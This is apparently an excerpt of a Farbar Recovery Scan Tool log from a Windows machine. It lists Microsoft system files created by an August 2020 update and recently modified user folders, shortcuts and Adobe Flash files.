2020-08-12 19:44 - 2020-08-12 19:44 - 000783480 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000782336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000775480 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000718336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000717312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.FileExplorer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000716312 _____ (Microsoft Corporation) C:\WINDOWS\system32\StateRepository.Core.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000702976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BTAGService.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000690536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000677888 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000675040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000675024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000673088 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000672256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000671744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wiaservc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000671040 _____ (Microsoft Corporation) C:\WINDOWS\system32\computecore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000668672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsecedit.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000661816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\afd.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000649728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000629760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000593480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000579584 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasdlg.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000572200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryPS.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000568128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000564488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StateRepository.Core.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnprv.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\iprtrmgr.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000550400 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000548352 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000535040 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasgcw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000534016 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000522688 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000521728 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpusersvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000516096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iprtrmgr.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000500224 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprdim.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.FileExplorer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000495104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasdlg.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000477496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2020-08-12 19:44 - 2020-08-12 19:44 - 000467968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000464384 _____ (Microsoft Corporation) C:\WINDOWS\system32\HrtfApo.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000463168 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000462848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000461112 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000457016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000456704 _____ (Microsoft Corporation) C:\WINDOWS\system32\upnphost.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000452096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TileDataRepository.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000441144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000435200 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000431104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasgcw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000410624 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000405504 _____ (Microsoft Corporation) C:\WINDOWS\system32\DispBroker.Desktop.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000403456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprdim.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000379704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncbservice.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000369304 _____ (Microsoft Corporation) C:\WINDOWS\system32\BCP47Langs.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000355840 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsrslvr.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000340992 _____ (Microsoft Corporation) C:\WINDOWS\system32\LanguageOverlayServer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000339456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\HrtfApo.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000335872 _____ (Microsoft Corporation) C:\WINDOWS\system32\RasMediaManager.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000321536 _____ (Microsoft Corporation) C:\WINDOWS\system32\sti.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000314368 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000312832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000307712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000302080 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcTok.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000287232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmWmiPl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicCapsule.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000277504 _____ (Microsoft Corporation) C:\WINDOWS\system32\scecli.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000273744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BCP47Langs.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000265216 _____ (Microsoft Corporation) C:\WINDOWS\system32\shdocvw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000265216 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000263680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000255488 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnservice.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000252928 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpatializerApo.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000247856 _____ (Microsoft Corporation) C:\WINDOWS\system32\weretw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000235520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmWmiPl.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000235520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shdocvw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallServiceTasks.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000228352 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasplap.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000220984 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000214016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scecli.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000211256 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcbloader.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000209208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000208384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryUpgrade.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000201544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_SIUF.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000199680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasplap.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000199480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Winlangdb.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000198656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBAUDIO.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000194048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SpatializerApo.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000193592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\weretw.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000186472 _____ (Microsoft Corporation) C:\WINDOWS\system32\BCP47mrm.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\net1.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000179712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallServiceTasks.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000179512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000179200 _____ (Microsoft Corporation) C:\WINDOWS\system32\rtm.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000175104 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvcext.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000174592 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmAuto.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryUpgrade.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000165176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryClient.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000161792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rtm.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000157184 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMapi.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000152416 _____ (Microsoft Corporation) C:\WINDOWS\system32\KerbClientShared.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000148992 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdrsvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000143872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmAuto.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Winlangdb.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000133256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BCP47mrm.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000132408 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinelsa.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageUsage.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\globinputhost.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000127064 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32u.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000125440 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdshext.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000124512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KerbClientShared.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000114176 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceUpdateAgent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdSSDP.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000104248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryBroker.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000096768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\globinputhost.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000092672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000090936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryBroker.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000089328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32u.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicAgent.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManMigrationPlugin.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\wiarpc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\CustomInstallExec.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpkinstall.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\keepaliveprovider.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\udhisapi.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000066048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManMigrationPlugin.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmRes.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmRes.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000060928 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf3216.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserLanguageProfileCallback.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf3216.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsmprovhost.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryCore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\cellulardatacapabilityhandler.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000044544 _____ (Microsoft Corporation) C:\WINDOWS\system32\werdiagcontroller.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000044032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserLanguageProfileCallback.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\upnpcont.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000040960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\afunix.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000038912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werdiagcontroller.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\acwow64.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000037376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsmprovhost.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000036352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManHTTPConfig.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000032256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryCore.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmAgent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\FaxPrinterInstaller.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Drivers\afunix.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 000028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicPS.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmAgent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setup16.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbservicetrigger.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\wiatrace.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000016384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntvdm64.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsmplpxy.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\dciman32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsmplpxy.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dciman32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\system32\iprtprio.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000009216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iprtprio.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\instnm.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimg32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000007168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimg32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000006144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wow32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000004608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 000003072 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpk.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\lpk.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 000000357 _____ C:\WINDOWS\system32\DrtmAuthKeyDelegate_From_20190529_To_20200303.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000357 _____ C:\WINDOWS\system32\DrtmAuth1KeyDelegate.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth9.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth8.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth7.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth6.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth5.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth4.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth3.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth2.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth12.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth11.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth10.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth1.bin
2020-08-12 19:35 - 2020-07-18 05:07 - 000390656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2020-08-12 19:35 - 2020-07-18 04:53 - 000492544 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-09-11 14:24 - 2019-03-19 06:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-09-11 14:23 - 2020-03-20 23:49 - 000000000 ____D C:\Users\Milan\AppData\LocalLow\Mozilla
2020-09-11 07:15 - 2020-04-05 22:19 - 000006107 _____ C:\ProgramData\DisplaySessionContainer13.log_backup1
2020-09-11 06:46 - 2020-03-21 10:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2020-09-10 20:41 - 2020-04-04 23:09 - 000006115 _____ C:\ProgramData\DisplaySessionContainer12.log_backup1
2020-09-10 17:45 - 2020-03-20 23:18 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-09-10 16:40 - 2020-06-07 10:48 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-09-10 16:40 - 2020-06-07 10:48 - 000002274 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2020-09-10 08:02 - 2020-04-04 00:12 - 000006119 _____ C:\ProgramData\DisplaySessionContainer11.log_backup1
2020-09-10 07:43 - 2020-05-31 14:59 - 000002178 _____ C:\Users\Milan\Desktop\JDownloader 2.lnk
2020-09-10 07:43 - 2020-03-28 17:28 - 000000958 _____ C:\Users\Milan\Desktop\Mockba to Berlin.lnk
2020-09-10 07:43 - 2020-03-21 14:38 - 000001080 _____ C:\Users\Milan\Desktop\SpeedFan.lnk
2020-09-09 20:32 - 2020-04-05 15:31 - 000000000 ____D C:\Users\Milan\AppData\Roaming\vlc
2020-09-09 20:32 - 2020-04-03 11:51 - 000006111 _____ C:\ProgramData\DisplaySessionContainer10.log_backup1
2020-09-09 08:42 - 2020-04-03 00:55 - 000006106 _____ C:\ProgramData\DisplaySessionContainer9.log_backup1
2020-09-09 07:58 - 2020-07-17 10:20 - 000000000 ____D C:\Users\Milan\Desktop\Nová složka
2020-09-08 19:55 - 2020-03-27 09:09 - 000006118 _____ C:\ProgramData\DisplaySessionContainer8.log_backup1
2020-09-08 16:01 - 2020-03-30 11:51 - 000004612 _____ C:\WINDOWS\system32\Tasks\Adobe Flash Player NPAPI Notifier
2020-09-08 16:01 - 2019-03-19 06:56 - 000842296 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2020-09-08 16:01 - 2019-03-19 06:56 - 000175160 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2020-09-08 16:01 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2020-09-08 16:01 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\Macromed
2020-09-08 08:24 - 2020-03-26 21:15 - 000006110 _____ C:\ProgramData\DisplaySessionContainer7.log_backup1
2020-09-07 20:23 - 2020-03-26 08:49 - 000006102 _____ C:\ProgramData\DisplaySessionContainer6.log_backup1
2020-09-07 07:56 - 2020-03-21 12:54 - 000006102 _____ C:\ProgramData\DisplaySessionContainer5.log_backup1
2020-09-06 16:33 - 2020-03-21 12:43 - 000006098 _____ C:\ProgramData\DisplaySessionContainer4.log_backup1
2020-09-04 20:52 - 2020-03-21 10:01 - 000006118 _____ C:\ProgramData\DisplaySessionContainer3.log_backup1
